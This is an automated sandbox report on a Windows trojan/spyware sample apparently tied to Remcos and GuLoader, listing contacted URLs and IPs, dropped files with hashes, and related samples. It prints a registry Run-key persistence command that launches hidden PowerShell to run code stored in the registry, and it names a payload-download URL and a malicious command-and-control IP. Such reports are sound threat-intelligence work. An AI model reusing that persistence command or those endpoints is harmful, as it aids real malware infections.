                http://geoplugin.net/json.gpdConspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gplHConspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.comrConspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gplConspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp.Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.comConspect124.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErrorSDWLLRJcsY.exe, 00000000.00000000.1682153020.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SDWLLRJcsY.exe, 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Conspect124.exe, 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gp5Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpyConspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comConspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.comConspect124.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://cmgtrading.eu/eODGqfP132.binCConspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.google.com/accounts/serviceloginConspect124.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://login.yahoo.com/config/loginConspect124.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/Conspect124.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.ebuddy.comConspect124.exefalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.26.107.57
                		cmgtrading.euFrance
                		24935ATE-ASFRfalse
                107.173.4.16
                		unknownUnited States
                		36352AS-COLOCROSSINGUStrue
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1518329
                Start date and time:2024-09-25 15:58:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 50s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SDWLLRJcsY.exe
                renamed because original name is a hash value
                Original Sample Name:7bd1cce43f6b48c8ddd492e5711fd17f.exe
                Detection:MAL
                Classification:mal100.phis.troj.spyw.evad.winEXE@17/15@2/3
                EGA Information:
                • Successful, ratio: 83.3%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 183
                • Number of non-executed functions: 232
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: SDWLLRJcsY.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:59:02API Interceptor42x Sleep call for process: powershell.exe modified
                10:02:05API Interceptor753065x Sleep call for process: Conspect124.exe modified
                15:01:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)
                15:01:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.26.107.57RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                • cmgtrading.eu/FqVHUWUBY92.bin
                xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • cmgtrading.eu/FqVHUWUBY92.bin
                GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                • cmgtrading.eu/FqVHUWUBY92.bin
                Doc_3485638568454.docx.docGet hashmaliciousAveMaria, UACMeBrowse
                • zqpispa.it/
                107.173.4.16RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                  xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                      Mcib4Llptj.exeGet hashmaliciousRemcosBrowse
                        SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exeGet hashmaliciousRemcosBrowse
                          2NyX8R4CZo.exeGet hashmaliciousRemcosBrowse
                            wcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
                              1Ccw7uyuFv.exeGet hashmaliciousRemcosBrowse
                                RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                  Soxj8psIXH.exeGet hashmaliciousRemcos, PrivateLoader, PureLog StealerBrowse
                                    178.237.33.50BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                                    • geoplugin.net/json.gp
                                    1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • geoplugin.net/json.gp
                                    AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • geoplugin.net/json.gp
                                    C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • geoplugin.net/json.gp
                                    RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • geoplugin.net/json.gp
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • geoplugin.net/json.gp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    cmgtrading.euRFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    geoplugin.netBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • 178.237.33.50
                                    RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ATOM86-ASATOM86NLBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 178.237.33.50
                                    Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                                    • 178.237.33.50
                                    1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    • 178.237.33.50
                                    AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 178.237.33.50
                                    C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • 178.237.33.50
                                    RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 178.237.33.50
                                    AS-COLOCROSSINGUSBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 104.168.32.148
                                    Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 192.210.150.29
                                    1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 192.3.146.145
                                    K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                    • 107.175.243.142
                                    C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                    • 107.175.113.252
                                    RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 107.173.4.16
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 107.173.4.16
                                    GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                    • 107.173.4.16
                                    TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                    • 107.175.113.252
                                    NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                    • 107.172.148.197
                                    ATE-ASFRRFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    https://forrefab.ae/Get hashmaliciousUnknownBrowse
                                    • 185.26.107.54
                                    nCOg3q4a8C.exeGet hashmaliciousAgentTeslaBrowse
                                    • 185.26.107.246
                                    SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                    • 185.26.106.244
                                    fQsT6cuFUj.exeGet hashmaliciousAgentTeslaBrowse
                                    • 185.26.107.246
                                    BiL6ODSRNK.exeGet hashmaliciousAgentTeslaBrowse
                                    • 185.26.107.246
                                    http://larrys474-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                    • 185.26.107.51
                                    https://cutt.ly/rwnG29k1Get hashmaliciousUnknownBrowse
                                    • 185.26.107.51

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 185.26.107.57
                                    cDErPwSuCB.exeGet hashmaliciousUnknownBrowse
                                    • 185.26.107.57
                                    tpq.ps1Get hashmaliciousUnknownBrowse
                                    • 185.26.107.57
                                    Kv1tZKstAC.exeGet hashmaliciousUnknownBrowse
                                    • 185.26.107.57
                                    z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 185.26.107.57
                                    Swift_Copy_401812_301823-30391_#9812_9202938.exeGet hashmaliciousGuLoader, PureLog StealerBrowse
                                    • 185.26.107.57
                                    117532123_20240925-9_MCZB#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57
                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 185.26.107.57
                                    CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                    • 185.26.107.57
                                    xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 185.26.107.57

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):962
                                    Entropy (8bit):5.013811273052389
                                    Encrypted:false
                                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Temp\Conspect124.exe

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):995120
                                    Entropy (8bit):6.308705975745299
                                    Encrypted:false
                                    SSDEEP:12288:5Ly0SryvXRpHnez0SBkasZa0kITLwn096zdZEkINz3WSV3:5Ly0SG/zHMBbsZadi80qZgNz3R
                                    MD5:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    SHA1:3F650D8993C542682AA61C725EA1BB4EE93D259A
                                    SHA-256:C5636797B8BAD3E9FF18F51D269ACE0948112D9FF03A9900A174687FEC4BAE3B
                                    SHA-512:FE804B78CD734192664366364B099A5676D58101B9FE03C40C925CFE1CC202A99E04094D0FA93338ED831015D7CCD2EDE88F04AB3CF6410542853A5A228FACE2
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 13%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.......................................@.........................................................X%...............................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Conspect124.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwwrfgsy.dtn.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufsza3e0.hd1.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\bhv9D68.tmp

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):15728640
                                    Entropy (8bit):0.10805027086476268
                                    Encrypted:false
                                    SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                    MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                    SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                    SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                    SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                    Malicious:false
                                    Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Epochally.Puk

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):351177
                                    Entropy (8bit):7.657835458357298
                                    Encrypted:false
                                    SSDEEP:6144:5CUTXNxYlA/sN5c49Y34ocMiNOSQGT0aMeoAB+mtWAV5og++d6r3Aq5:pXbsN5hY3AMiXQGT3BXtWK5og+06r3N5
                                    MD5:7E58D69270577649E3FEC5909C0E0F20
                                    SHA1:C92DE1CDD263A8AFAB112624F7FE3DD991B11BC3
                                    SHA-256:D9271BAAAE1E38C317AB57E2E2CA4A0F3448B23ADB16AF5894F0A55F3CCF5728
                                    SHA-512:B1C38694C80459B66DC7A34017D6F6A11C57251E9EB6E4F96D14BDE9917B0B4D3D85B2875AAF550CE2159DC119EDE91705E0A4AB9A7FF78D81F4D20110667EE4
                                    Malicious:false
                                    Preview:............z....... ............_...........u....>........UUUU..)...............**.d...9......KK.....QQ..Z.......==.22...#####..............NN.....g.................c...........a........{....q.......[.................eeeeee.Z.6..................................F.....................bbb.o...2.......MM..////.GG..*..9999.............(((.................................0...T...$..SSSS.u....)......................--.VVV.......!.....................CC.............EEE......H.....VV..).............J...A..........XX.....LL..........................}}}.............K.............. ..AA..................b.@@...............>>>........N......44.......FFFF............,..........I...@@@@@.......................QQ......................F.l.....;;;;;...t.~.ff........>>.............99..............JJ.nnnnnn.h....hhhhhh.....'.....(((...............h.gggggg................UU......................dd...cc.$$..kk....|......VV......8..(.xx..............J...............".................bbb...................

                                    C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene\brkops.ind

                                    Download File
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):385193
                                    Entropy (8bit):1.2513468259126719
                                    Encrypted:false
                                    SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                    MD5:C73A822A5DC42DEF82529419505D4D34
                                    SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
